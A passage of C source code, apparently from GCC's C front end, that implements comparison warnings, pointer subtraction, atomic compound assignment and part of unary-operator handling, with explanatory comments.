if (TREE_CODE (TREE_TYPE (t)) != BOOLEAN_TYPE)
warn_logical_not_parentheses (location, code, arg1.value, arg2.value);
}
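/* e.g. "!x == 2" is diagnosed here under -Wlogical-not-parentheses,
since the user probably meant "!(x == 2)"; "!!x == y" and "!b == y"
with a boolean-typed b are deliberately exempted above. */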
/* Warn about comparisons against string literals, with the exception
of testing for equality or inequality of a string literal with NULL. */
if (code == EQ_EXPR || code == NE_EXPR)
{
if ((code1 == STRING_CST
&& !integer_zerop (tree_strip_nop_conversions (arg2.value)))
|| (code2 == STRING_CST
&& !integer_zerop (tree_strip_nop_conversions (arg1.value))))
warning_at (location, OPT_Waddress,
"comparison with string literal results in unspecified behavior");
/* Warn for ptr == '\0', it's likely that it should've been ptr[0]. */
if (POINTER_TYPE_P (type1)
&& null_pointer_constant_p (arg2.value)
&& char_type_p (type2))
{
auto_diagnostic_group d;
if (warning_at (location, OPT_Wpointer_compare,
"comparison between pointer and zero character "
"constant"))
inform (arg1.get_start (),
"did you mean to dereference the pointer?");
}
else if (POINTER_TYPE_P (type2)
&& null_pointer_constant_p (arg1.value)
&& char_type_p (type1))
{
auto_diagnostic_group d;
if (warning_at (location, OPT_Wpointer_compare,
"comparison between pointer and zero character "
"constant"))
inform (arg2.get_start (),
"did you mean to dereference the pointer?");
}
}
else if (TREE_CODE_CLASS (code) == tcc_comparison
&& (code1 == STRING_CST || code2 == STRING_CST))
warning_at (location, OPT_Waddress,
"comparison with string literal results in unspecified behavior");
if (TREE_OVERFLOW_P (result.value)
&& !TREE_OVERFLOW_P (arg1.value)
&& !TREE_OVERFLOW_P (arg2.value))
overflow_warning (location, result.value);
/* Warn about comparisons of different enum types. */
if (warn_enum_compare
&& TREE_CODE_CLASS (code) == tcc_comparison
&& TREE_CODE (type1) == ENUMERAL_TYPE
&& TREE_CODE (type2) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (type1) != TYPE_MAIN_VARIANT (type2))
warning_at (location, OPT_Wenum_compare,
"comparison between %qT and %qT",
type1, type2);
return result;
}
/* Return a tree for the difference of pointers OP0 and OP1.
The resulting tree has type ptrdiff_t. If POINTER_SUBTRACT sanitization
is enabled, store a call to the libsanitizer hook in *INSTRUMENT_EXPR. */
static tree
pointer_diff (location_t loc, tree op0, tree op1, tree *instrument_expr)
{
tree restype = ptrdiff_type_node;
tree result, inttype;
addr_space_t as0 = TYPE_ADDR_SPACE (TREE_TYPE (TREE_TYPE (op0)));
addr_space_t as1 = TYPE_ADDR_SPACE (TREE_TYPE (TREE_TYPE (op1)));
tree target_type = TREE_TYPE (TREE_TYPE (op0));
tree orig_op0 = op0;
tree orig_op1 = op1;
/* If the operands point into different address spaces, we need to
explicitly convert them to pointers into the common address space
before we can subtract the numerical address values. */
if (as0 != as1)
{
addr_space_t as_common;
tree common_type;
/* Determine the common superset address space. This is guaranteed
to exist because the caller verified that comp_target_types
returned non-zero. */
if (!addr_space_superset (as0, as1, &as_common))
gcc_unreachable ();
common_type = common_pointer_type (TREE_TYPE (op0), TREE_TYPE (op1));
op0 = convert (common_type, op0);
op1 = convert (common_type, op1);
}
/* Determine integer type result of the subtraction. This will usually
be the same as the result type (ptrdiff_t), but may need to be a wider
type if pointers for the address space are wider than ptrdiff_t. */
if (TYPE_PRECISION (restype) < TYPE_PRECISION (TREE_TYPE (op0)))
inttype = c_common_type_for_size (TYPE_PRECISION (TREE_TYPE (op0)), 0);
else
inttype = restype;
if (TREE_CODE (target_type) == VOID_TYPE)
pedwarn (loc, OPT_Wpointer_arith,
"pointer of type %<void *%> used in subtraction");
if (TREE_CODE (target_type) == FUNCTION_TYPE)
pedwarn (loc, OPT_Wpointer_arith,
"pointer to a function used in subtraction");
if (sanitize_flags_p (SANITIZE_POINTER_SUBTRACT))
{
gcc_assert (current_function_decl != NULL_TREE);
op0 = save_expr (op0);
op1 = save_expr (op1);
tree tt = builtin_decl_explicit (BUILT_IN_ASAN_POINTER_SUBTRACT);
*instrument_expr = build_call_expr_loc (loc, tt, 2, op0, op1);
}
/* First do the subtraction, then build the divide operator
and only convert at the very end.
Do not do default conversions in case restype is a short type. */
/* POINTER_DIFF_EXPR requires a signed integer type of the same size as
pointers. If some platform cannot provide that, or has a larger
ptrdiff_type to support differences larger than half the address
space, cast the pointers to some larger integer type and do the
computations in that type. */
if (TYPE_PRECISION (inttype) > TYPE_PRECISION (TREE_TYPE (op0)))
op0 = build_binary_op (loc, MINUS_EXPR, convert (inttype, op0),
convert (inttype, op1), false);
else
{
/* Cast away qualifiers. */
op0 = convert (c_common_type (TREE_TYPE (op0), TREE_TYPE (op0)), op0);
op1 = convert (c_common_type (TREE_TYPE (op1), TREE_TYPE (op1)), op1);
op0 = build2_loc (loc, POINTER_DIFF_EXPR, inttype, op0, op1);
}
/* This generates an error if op1 is a pointer to an incomplete type. */
if (!COMPLETE_OR_VOID_TYPE_P (TREE_TYPE (TREE_TYPE (orig_op1))))
error_at (loc, "arithmetic on pointer to an incomplete type");
else if (verify_type_context (loc, TCTX_POINTER_ARITH,
TREE_TYPE (TREE_TYPE (orig_op0))))
verify_type_context (loc, TCTX_POINTER_ARITH,
TREE_TYPE (TREE_TYPE (orig_op1)));
op1 = c_size_in_bytes (target_type);
if (pointer_to_zero_sized_aggr_p (TREE_TYPE (orig_op1)))
error_at (loc, "arithmetic on pointer to an empty aggregate");
/* Divide by the size, in easiest possible way. */
result = fold_build2_loc (loc, EXACT_DIV_EXPR, inttype,
op0, convert (inttype, op1));
/* Convert to final result type if necessary. */
return convert (restype, result);
}
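/* Worked example of the above (a sketch, assuming 4-byte int): for
"int a[8]; ptrdiff_t d = &a[5] - &a[1];" the POINTER_DIFF_EXPR
computes the byte difference 16, and the EXACT_DIV_EXPR by
c_size_in_bytes (int) == 4 yields d == 4. */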
/* Expand atomic compound assignments into an appropriate sequence as
specified by the C11 standard section 6.5.16.2.
_Atomic T1 E1
T2 E2
E1 op= E2
This sequence is used for all types for which these operations are
supported.
In addition, built-in versions of the 'fe' prefixed routines may
need to be invoked for floating point (real, complex or vector) when
floating-point exceptions are supported. See 6.5.16.2 footnote 113.
T1 newval;
T1 old;
T1 *addr;
T2 val;
fenv_t fenv;
addr = &E1;
val = (E2);
__atomic_load (addr, &old, SEQ_CST);
feholdexcept (&fenv);
loop:
newval = old op val;
if (__atomic_compare_exchange_strong (addr, &old, &newval, SEQ_CST,
SEQ_CST))
goto done;
feclearexcept (FE_ALL_EXCEPT);
goto loop;
done:
feupdateenv (&fenv);
The compiler will issue the __atomic_fetch_* built-in when possible,
otherwise it will generate the generic form of the atomic operations.
The generic form requires temporaries whose addresses are taken. The
atomic processing is smart enough to figure out when the size of an
object permits a lock-free version, and converts the built-in call to
the appropriate lock-free routine. The optimizers then dispose of any
temporaries that are no longer required, and lock-free implementations
are used as long as there is target support for the required size.
If the operator is NOP_EXPR, then this is a simple assignment, and
an __atomic_store is issued to perform the assignment rather than
the above loop. */
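/* Concrete sketch of the two forms: for "_Atomic int counter;
counter += 5;" the lock-free path reduces to a single
"__atomic_add_fetch (&counter, 5, __ATOMIC_SEQ_CST)" call, whereas a
type with no matching fetch-op built-in (e.g. _Atomic double) goes
through the __atomic_load / compare-exchange loop spelled out above. */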
/* Build an atomic assignment at LOC, expanding into the proper
sequence to store LHS MODIFYCODE= RHS. Return a value representing
the result of the operation, unless RETURN_OLD_P, in which case
return the old value of LHS (this is only for postincrement and
postdecrement). */
static tree
build_atomic_assign (location_t loc, tree lhs, enum tree_code modifycode,
tree rhs, bool return_old_p)
{
tree fndecl, func_call;
vec<tree, va_gc> *params;
tree val, nonatomic_lhs_type, nonatomic_rhs_type, newval, newval_addr;
tree old, old_addr;
tree compound_stmt = NULL_TREE;
tree stmt, goto_stmt;
tree loop_label, loop_decl, done_label, done_decl;
tree lhs_type = TREE_TYPE (lhs);
tree lhs_addr = build_unary_op (loc, ADDR_EXPR, lhs, false);
tree seq_cst = build_int_cst (integer_type_node, MEMMODEL_SEQ_CST);
tree rhs_semantic_type = TREE_TYPE (rhs);
tree nonatomic_rhs_semantic_type;
tree rhs_type;
gcc_assert (TYPE_ATOMIC (lhs_type));
if (return_old_p)
gcc_assert (modifycode == PLUS_EXPR || modifycode == MINUS_EXPR);
/* Allocate enough vector items for a compare_exchange. */
vec_alloc (params, 6);
/* Create a compound statement to hold the sequence of statements
with a loop. */
if (modifycode != NOP_EXPR)
{
compound_stmt = c_begin_compound_stmt (false);
/* For consistency with build_modify_expr on non-_Atomic,
mark the lhs as read. Also, it would be very hard to match
such expressions in mark_exp_read. */
mark_exp_read (lhs);
}
/* Remove any excess precision (which is only present here in the
case of compound assignments). */
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
{
gcc_assert (modifycode != NOP_EXPR);
rhs = TREE_OPERAND (rhs, 0);
}
rhs_type = TREE_TYPE (rhs);
/* Fold the RHS if it hasn't already been folded. */
if (modifycode != NOP_EXPR)
rhs = c_fully_fold (rhs, false, NULL);
/* Remove the qualifiers for the rest of the expressions and create
the VAL temp variable to hold the RHS. */
nonatomic_lhs_type = build_qualified_type (lhs_type, TYPE_UNQUALIFIED);
nonatomic_rhs_type = build_qualified_type (rhs_type, TYPE_UNQUALIFIED);
nonatomic_rhs_semantic_type = build_qualified_type (rhs_semantic_type,
TYPE_UNQUALIFIED);
val = create_tmp_var_raw (nonatomic_rhs_type);
TREE_ADDRESSABLE (val) = 1;
TREE_NO_WARNING (val) = 1;
rhs = build4 (TARGET_EXPR, nonatomic_rhs_type, val, rhs, NULL_TREE,
NULL_TREE);
TREE_SIDE_EFFECTS (rhs) = 1;
SET_EXPR_LOCATION (rhs, loc);
if (modifycode != NOP_EXPR)
add_stmt (rhs);
/* NOP_EXPR indicates it's a straight store of the RHS. Simply issue
an atomic_store. */
if (modifycode == NOP_EXPR)
{
compound_stmt = rhs;
/* Build __atomic_store (&lhs, &val, SEQ_CST) */
rhs = build_unary_op (loc, ADDR_EXPR, val, false);
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_STORE);
params->quick_push (lhs_addr);
params->quick_push (rhs);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
compound_stmt = build2 (COMPOUND_EXPR, void_type_node,
compound_stmt, func_call);
/* VAL is the value which was stored, return a COMPOUND_STMT of
the statement and that value. */
return build2 (COMPOUND_EXPR, nonatomic_lhs_type, compound_stmt, val);
}
/* Attempt to implement the atomic operation as an __atomic_fetch_* or
__atomic_*_fetch built-in rather than a CAS loop. atomic_bool type
isn't applicable for such builtins. ??? Do we want to handle enums? */
if ((TREE_CODE (lhs_type) == INTEGER_TYPE || POINTER_TYPE_P (lhs_type))
&& TREE_CODE (rhs_type) == INTEGER_TYPE)
{
built_in_function fncode;
switch (modifycode)
{
case PLUS_EXPR:
case POINTER_PLUS_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_ADD_N
: BUILT_IN_ATOMIC_ADD_FETCH_N);
break;
case MINUS_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_SUB_N
: BUILT_IN_ATOMIC_SUB_FETCH_N);
break;
case BIT_AND_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_AND_N
: BUILT_IN_ATOMIC_AND_FETCH_N);
break;
case BIT_IOR_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_OR_N
: BUILT_IN_ATOMIC_OR_FETCH_N);
break;
case BIT_XOR_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_XOR_N
: BUILT_IN_ATOMIC_XOR_FETCH_N);
break;
default:
goto cas_loop;
}
/* We can only use "_1" through "_16" variants of the atomic fetch
built-ins. */
unsigned HOST_WIDE_INT size = tree_to_uhwi (TYPE_SIZE_UNIT (lhs_type));
if (size != 1 && size != 2 && size != 4 && size != 8 && size != 16)
goto cas_loop;
/* If this is a pointer type, we need to multiply by the size of
the pointer target type. */
if (POINTER_TYPE_P (lhs_type))
{
if (!COMPLETE_TYPE_P (TREE_TYPE (lhs_type))
/* ??? This would introduce -Wdiscarded-qualifiers
warning: __atomic_fetch_* expect volatile void *
type as the first argument. (Assignments between
atomic and non-atomic objects are OK.) */
|| TYPE_RESTRICT (lhs_type))
goto cas_loop;
tree sz = TYPE_SIZE_UNIT (TREE_TYPE (lhs_type));
rhs = fold_build2_loc (loc, MULT_EXPR, ptrdiff_type_node,
convert (ptrdiff_type_node, rhs),
convert (ptrdiff_type_node, sz));
}
/* Build __atomic_fetch_* (&lhs, &val, SEQ_CST), or
__atomic_*_fetch (&lhs, &val, SEQ_CST). */
fndecl = builtin_decl_explicit (fncode);
params->quick_push (lhs_addr);
params->quick_push (rhs);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
newval = create_tmp_var_raw (nonatomic_lhs_type);
TREE_ADDRESSABLE (newval) = 1;
TREE_NO_WARNING (newval) = 1;
rhs = build4 (TARGET_EXPR, nonatomic_lhs_type, newval, func_call,
NULL_TREE, NULL_TREE);
SET_EXPR_LOCATION (rhs, loc);
add_stmt (rhs);
/* Finish the compound statement. */
compound_stmt = c_end_compound_stmt (loc, compound_stmt, false);
/* NEWVAL is the value which was stored, return a COMPOUND_STMT of
the statement and that value. */
return build2 (COMPOUND_EXPR, nonatomic_lhs_type, compound_stmt, newval);
}
cas_loop:
/* Create the variables and labels required for the op= form. */
old = create_tmp_var_raw (nonatomic_lhs_type);
old_addr = build_unary_op (loc, ADDR_EXPR, old, false);
TREE_ADDRESSABLE (old) = 1;
TREE_NO_WARNING (old) = 1;
newval = create_tmp_var_raw (nonatomic_lhs_type);
newval_addr = build_unary_op (loc, ADDR_EXPR, newval, false);
TREE_ADDRESSABLE (newval) = 1;
TREE_NO_WARNING (newval) = 1;
loop_decl = create_artificial_label (loc);
loop_label = build1 (LABEL_EXPR, void_type_node, loop_decl);
done_decl = create_artificial_label (loc);
done_label = build1 (LABEL_EXPR, void_type_node, done_decl);
/* __atomic_load (addr, &old, SEQ_CST). */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_LOAD);
params->quick_push (lhs_addr);
params->quick_push (old_addr);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
old = build4 (TARGET_EXPR, nonatomic_lhs_type, old, func_call, NULL_TREE,
NULL_TREE);
add_stmt (old);
params->truncate (0);
/* Create the expressions for floating-point environment
manipulation, if required. */
bool need_fenv = (flag_trapping_math
&& (FLOAT_TYPE_P (lhs_type) || FLOAT_TYPE_P (rhs_type)));
tree hold_call = NULL_TREE, clear_call = NULL_TREE, update_call = NULL_TREE;
if (need_fenv)
targetm.atomic_assign_expand_fenv (&hold_call, &clear_call, &update_call);
if (hold_call)
add_stmt (hold_call);
/* loop: */
add_stmt (loop_label);
/* newval = old + val; */
if (rhs_type != rhs_semantic_type)
val = build1 (EXCESS_PRECISION_EXPR, nonatomic_rhs_semantic_type, val);
rhs = build_binary_op (loc, modifycode, old, val, true);
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
{
tree eptype = TREE_TYPE (rhs);
rhs = c_fully_fold (TREE_OPERAND (rhs, 0), false, NULL);
rhs = build1 (EXCESS_PRECISION_EXPR, eptype, rhs);
}
else
rhs = c_fully_fold (rhs, false, NULL);
rhs = convert_for_assignment (loc, UNKNOWN_LOCATION, nonatomic_lhs_type,
rhs, NULL_TREE, ic_assign, false, NULL_TREE,
NULL_TREE, 0);
if (rhs != error_mark_node)
{
rhs = build4 (TARGET_EXPR, nonatomic_lhs_type, newval, rhs, NULL_TREE,
NULL_TREE);
SET_EXPR_LOCATION (rhs, loc);
add_stmt (rhs);
}
/* if (__atomic_compare_exchange (addr, &old, &new, false, SEQ_CST, SEQ_CST))
goto done; */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_COMPARE_EXCHANGE);
params->quick_push (lhs_addr);
params->quick_push (old_addr);
params->quick_push (newval_addr);
params->quick_push (integer_zero_node);
params->quick_push (seq_cst);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
goto_stmt = build1 (GOTO_EXPR, void_type_node, done_decl);
SET_EXPR_LOCATION (goto_stmt, loc);
stmt = build3 (COND_EXPR, void_type_node, func_call, goto_stmt, NULL_TREE);
SET_EXPR_LOCATION (stmt, loc);
add_stmt (stmt);
if (clear_call)
add_stmt (clear_call);
/* goto loop; */
goto_stmt = build1 (GOTO_EXPR, void_type_node, loop_decl);
SET_EXPR_LOCATION (goto_stmt, loc);
add_stmt (goto_stmt);
/* done: */
add_stmt (done_label);
if (update_call)
add_stmt (update_call);
/* Finish the compound statement. */
compound_stmt = c_end_compound_stmt (loc, compound_stmt, false);
/* NEWVAL is the value that was successfully stored, return a
COMPOUND_EXPR of the statement and the appropriate value. */
return build2 (COMPOUND_EXPR, nonatomic_lhs_type, compound_stmt,
return_old_p ? old : newval);
}
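/* Usage sketch: for "_Atomic int x;", "x++" arrives here from
build_unary_op as build_atomic_assign (loc, x, PLUS_EXPR,
integer_one_node, true), so the returned COMPOUND_EXPR yields OLD
(the value before the increment); "++x" passes RETURN_OLD_P == false
and yields NEWVAL instead. */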
/* Construct and perhaps optimize a tree representation
for a unary operation. CODE, a tree_code, specifies the operation
and XARG is the operand.
For any CODE other than ADDR_EXPR, NOCONVERT suppresses the default
promotions (such as from short to int).
For ADDR_EXPR, the default promotions are not applied; NOCONVERT allows
non-lvalues; this is only used to handle conversion of non-lvalue arrays
to pointers in C99.
LOCATION is the location of the operator. */
tree
build_unary_op (location_t location, enum tree_code code, tree xarg,
bool noconvert)
{
/* No default_conversion here. It causes trouble for ADDR_EXPR. */
tree arg = xarg;
tree argtype = NULL_TREE;
enum tree_code typecode;
tree val;
tree ret = error_mark_node;
tree eptype = NULL_TREE;
const char *invalid_op_diag;
bool int_operands;
int_operands = EXPR_INT_CONST_OPERANDS (xarg);
if (int_operands)
arg = remove_c_maybe_const_expr (arg);
if (code != ADDR_EXPR)
arg = require_complete_type (location, arg);
typecode = TREE_CODE (TREE_TYPE (arg));
if (typecode == ERROR_MARK)
return error_mark_node;
if (typecode == ENUMERAL_TYPE || typecode == BOOLEAN_TYPE)
typecode = INTEGER_TYPE;
if ((invalid_op_diag
= targetm.invalid_unary_op (code, TREE_TYPE (xarg))))
{
error_at (location, invalid_op_diag);
return error_mark_node;
}
if (TREE_CODE (arg) == EXCESS_PRECISION_EXPR)
{
eptype = TREE_TYPE (arg);
arg = TREE_OPERAND (arg, 0);
}
switch (code)
{
case CONVERT_EXPR:
/* This is used for unary plus, because a CONVERT_EXPR
is enough to prevent anybody from looking inside for
associativity, but won't generate any code. */
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE
|| typecode == FIXED_POINT_TYPE || typecode == COMPLEX_TYPE
|| gnu_vector_type_p (TREE_TYPE (arg))))
{
error_at (location, "wrong type argument to unary plus");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
arg = non_lvalue_loc (location, arg);
break;
case NEGATE_EXPR:
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE
|| typecode == FIXED_POINT_TYPE || typecode == COMPLEX_TYPE
|| gnu_vector_type_p (TREE_TYPE (arg))))
{
error_at (location, "wrong type argument to unary minus");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case BIT_NOT_EXPR:
/* ~ works on integer types and non-float vectors. */
if (typecode == INTEGER_TYPE
|| (gnu_vector_type_p (TREE_TYPE (arg))
&& !VECTOR_FLOAT_TYPE_P (TREE_TYPE (arg))))
{
tree e = arg;
/* Warn if the expression has boolean value. */
while (TREE_CODE (e) == COMPOUND_EXPR)
e = TREE_OPERAND (e, 1);
if ((TREE_CODE (TREE_TYPE (arg)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (e))))
{
auto_diagnostic_group d;
if (warning_at (location, OPT_Wbool_operation,
"%<~%> on a boolean expression"))
{
gcc_rich_location richloc (location);
richloc.add_fixit_insert_before (location, "!");
inform (&richloc, "did you mean to use logical not?");
}
}
if (!noconvert)
arg = default_conversion (arg);
}
else if (typecode == COMPLEX_TYPE)
{
code = CONJ_EXPR;
pedwarn (location, OPT_Wpedantic,
"ISO C does not support %<~%> for complex conjugation");
if (!noconvert)
arg = default_conversion (arg);
}
else
{
error_at (location, "wrong type argument to bit-complement");
return error_mark_node;
}
break;
case ABS_EXPR:
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE))
{
error_at (location, "wrong type argument to abs");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case ABSU_EXPR:
if (typecode != INTEGER_TYPE)
{
error_at (location, "wrong type argument to absu");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case CONJ_EXPR:
/* Conjugating a real value is a no-op, but allow it anyway. */
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE
|| typecode == COMPLEX_TYPE))
{
error_at (location, "wrong type argument to conjugation");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case TRUTH_NOT_EXPR:
if (typecode != INTEGER_TYPE && typecode != FIXED_POINT_TYPE
&& typecode != REAL_TYPE && typecode != POINTER_TYPE
&& typecode != COMPLEX_TYPE)
{
error_at (location,
"wrong type argument to unary exclamation mark");
return error_mark_node;
}
if (int_operands)
{
arg = c_objc_common_truthvalue_conversion (location, xarg);
arg = remove_c_maybe_const_expr (arg);
}
else
arg = c_objc_common_truthvalue_conversion (location, arg);
ret = invert_truthvalue_loc (location, arg);
/* If the TRUTH_NOT_EXPR has been folded, reset the location. */
if (EXPR_P (ret) && EXPR_HAS_LOCATION (ret))
location = EXPR_LOCATION (ret);
goto return_build_unary_op;
case REALPART_EXPR:
case IMAGPART_EXPR:
ret = build_real_imag_expr (location, code, arg);
if (ret == error_mark_node)
return error_mark_node;
if (eptype && TREE_CODE (eptype) == COMPLEX_TYPE)
eptype = TREE_TYPE (eptype);
goto return_build_unary_op;
case PREINCREMENT_EXPR:
case POSTINCREMENT_EXPR:
case PREDECREMENT_EXPR:
case POSTDECREMENT_EXPR:
if (TREE_CODE (arg) == C_MAYBE_CONST_EXPR)
{
tree inner = build_unary_op (location, code,
C_MAYBE_CONST_EXPR_EXPR (arg),
noconvert);
if (inner == error_mark_node)
return error_mark_node;
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (inner),
C_MAYBE_CONST_EXPR_PRE (arg), inner);
gcc_assert (!C_MAYBE_CONST_EXPR_INT_OPERANDS (arg));
C_MAYBE_CONST_EXPR_NON_CONST (ret) = 1;
goto return_build_unary_op;
}
/* Complain about anything that is not a true lvalue. In
Objective-C, skip this check for property_refs. */
if (!objc_is_property_ref (arg)
&& !lvalue_or_else (location,
arg, ((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? lv_increment
: lv_decrement)))
return error_mark_node;
if (warn_cxx_compat && TREE_CODE (TREE_TYPE (arg)) == ENUMERAL_TYPE)
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
warning_at (location, OPT_Wc___compat,
"increment of enumeration value is invalid in C++");
else
warning_at (location, OPT_Wc___compat,
"decrement of enumeration value is invalid in C++");
}
if (TREE_CODE (TREE_TYPE (arg)) == BOOLEAN_TYPE)
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
warning_at (location, OPT_Wbool_operation,
"increment of a boolean expression");
else
warning_at (location, OPT_Wbool_operation,
"decrement of a boolean expression");
}
/* Ensure the argument is fully folded inside any SAVE_EXPR. */
arg = c_fully_fold (arg, false, NULL, true);
bool atomic_op;
atomic_op = really_atomic_lvalue (arg);
/* Increment or decrement the real part of the value,
and don't change the imaginary part. */
if (typecode == COMPLEX_TYPE)
{
tree real, imag;
pedwarn (location, OPT_Wpedantic,
"ISO C does not support %<++%> and %<--%> on complex types");
if (!atomic_op)
{
arg = stabilize_reference (arg);
real = build_unary_op (EXPR_LOCATION (arg), REALPART_EXPR, arg,
true);
imag = build_unary_op (EXPR_LOCATION (arg), IMAGPART_EXPR, arg,
true);
real = build_unary_op (EXPR_LOCATION (arg), code, real, true);
if (real == error_mark_node || imag == error_mark_node)
return error_mark_node;
ret = build2 (COMPLEX_EXPR, TREE_TYPE (arg),
real, imag);
goto return_build_unary_op;
}
}
/* Report invalid types. */
if (typecode != POINTER_TYPE && typecode != FIXED_POINT_TYPE
&& typecode != INTEGER_TYPE && typecode != REAL_TYPE
&& typecode != COMPLEX_TYPE
&& !gnu_vector_type_p (TREE_TYPE (arg)))
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
error_at (location, "wrong type argument to increment");
else
error_at (location, "wrong type argument to decrement");
return error_mark_node;
}
{
tree inc;
argtype = TREE_TYPE (arg);
/* Compute the increment. */
if (typecode == POINTER_TYPE)
{
/* If pointer target is an incomplete type,
we just cannot know how to do the arithmetic. */
if (!COMPLETE_OR_VOID_TYPE_P (TREE_TYPE (argtype)))
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
error_at (location,
"increment of pointer to an incomplete type %qT",
TREE_TYPE (argtype));
else
error_at (location,
"decrement of pointer to an incomplete type %qT",
TREE_TYPE (argtype));
}
else if (TREE_CODE (TREE_TYPE (argtype)) == FUNCTION_TYPE
|| TREE_CODE (TREE_TYPE (argtype)) == VOID_TYPE)
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
pedwarn (location, OPT_Wpointer_arith,
"wrong type argument to increment");
else
pedwarn (location, OPT_Wpointer_arith,
"wrong type argument to decrement");
}
else
verify_type_context (location, TCTX_POINTER_ARITH,
TREE_TYPE (argtype));
inc = c_size_in_bytes (TREE_TYPE (argtype));
inc = convert_to_ptrofftype_loc (location, inc);
}
else if (FRACT_MODE_P (TYPE_MODE (argtype)))
{
/* For signed fract types, we invert ++ to -- or
-- to ++, and change inc from 1 to -1, because
it is not possible to represent 1 in signed fract constants.
For unsigned fract types, the result always overflows and
we get an undefined (original) or the maximum value. */
if (code == PREINCREMENT_EXPR)
code = PREDECREMENT_EXPR;
else if (code == PREDECREMENT_EXPR)
code = PREINCREMENT_EXPR;
else if (code == POSTINCREMENT_EXPR)
code = POSTDECREMENT_EXPR;
else /* code == POSTDECREMENT_EXPR */
code = POSTINCREMENT_EXPR;
inc = integer_minus_one_node;
inc = convert (argtype, inc);
}
else
{
inc = VECTOR_TYPE_P (argtype)
? build_one_cst (argtype)
: integer_one_node;
inc = convert (argtype, inc);
}
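/* Sketch of the signed fract case above: "++f" on a signed _Fract f
is rewritten as a predecrement with INC == -1, i.e. f - (-1), because
+1 is not representable in a signed fract type (its range is [-1, 1))
while -1 is. */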
/* If 'arg' is an Objective-C PROPERTY_REF expression, then we
need to ask Objective-C to build the increment or decrement
expression for it. */
if (objc_is_property_ref (arg))
return objc_build_incr_expr_for_property_ref (location, code,
arg, inc);
/* Report a read-only lvalue. */
if (TYPE_READONLY (argtype))
{
readonly_error (location, arg,
((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? lv_increment : lv_decrement));
return error_mark_node;
}
else if (TREE_READONLY (arg))
readonly_warning (arg,
((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? lv_increment : lv_decrement));
/* If the argument is atomic, use the special code sequences for
atomic compound assignment. */
if (atomic_op)
{
arg = stabilize_reference (arg);
ret = build_atomic_assign (location, arg,
((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? PLUS_EXPR
: MINUS_EXPR),
(FRACT_MODE_P (TYPE_MODE (argtype))
? inc
: integer_one_node),
(code == POSTINCREMENT_EXPR
|| code == POSTDECREMENT_EXPR));
goto return_build_unary_op;
}
if (TREE_CODE (TREE_TYPE (arg)) == BOOLEAN_TYPE)
val = boolean_increment (code, arg);
else
val = build2 (code, TREE_TYPE (arg), arg, inc);
TREE_SIDE_EFFECTS (val) = 1;
if (TREE_CODE (val) != code)
TREE_NO_WARNING (val) = 1;
ret = val;
goto return_build_unary_op;
}
case ADDR_EXPR:
/* Note that this operation never does default_conversion. */
/* The operand of unary '&' must be an lvalue (which excludes
expressions of type void), or, in C99, the result of a [] or
unary '*' operator. */
if (VOID_TYPE_P (TREE_TYPE (arg))
&& TYPE_QUALS (TREE_TYPE (arg)) == TYPE_UNQUALIFIED
&& (!INDIRECT_REF_P (arg) || !flag_isoc99))
pedwarn (location, 0, "taking address of expression of type %<void%>");
/* Let &* cancel out to simplify resulting code. */
if (INDIRECT_REF_P (arg))
{
/* Don't let this be an lvalue. */
if (lvalue_p (TREE_OPERAND (arg, 0)))
return non_lvalue_loc (location, TREE_OPERAND (arg, 0));
ret = TREE_OPERAND (arg, 0);
goto return_build_unary_op;
}
/* Anything not already handled and not a true memory reference
or a non-lvalue array is an error. */
if (typecode != FUNCTION_TYPE && !noconvert
&& !lvalue_or_else (location, arg, lv_addressof))
return error_mark_node;
/* Move address operations inside C_MAYBE_CONST_EXPR to simplify
folding later. */
if (TREE_CODE (arg) == C_MAYBE_CONST_EXPR)
{
tree inner = build_unary_op (location, code,
C_MAYBE_CONST_EXPR_EXPR (arg),
noconvert);
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (inner),
C_MAYBE_CONST_EXPR_PRE (arg), inner);
gcc_assert (!C_MAYBE_CONST_EXPR_INT_OPERANDS (arg));
C_MAYBE_CONST_EXPR_NON_CONST (ret)
= C_MAYBE_CONST_EXPR_NON_CONST (arg);
goto return_build_unary_op;
}
/* Ordinary case; arg is a COMPONENT_REF or a decl. */
argtype = TREE_TYPE (arg);
/* If the lvalue is const or volatile, merge that into the type
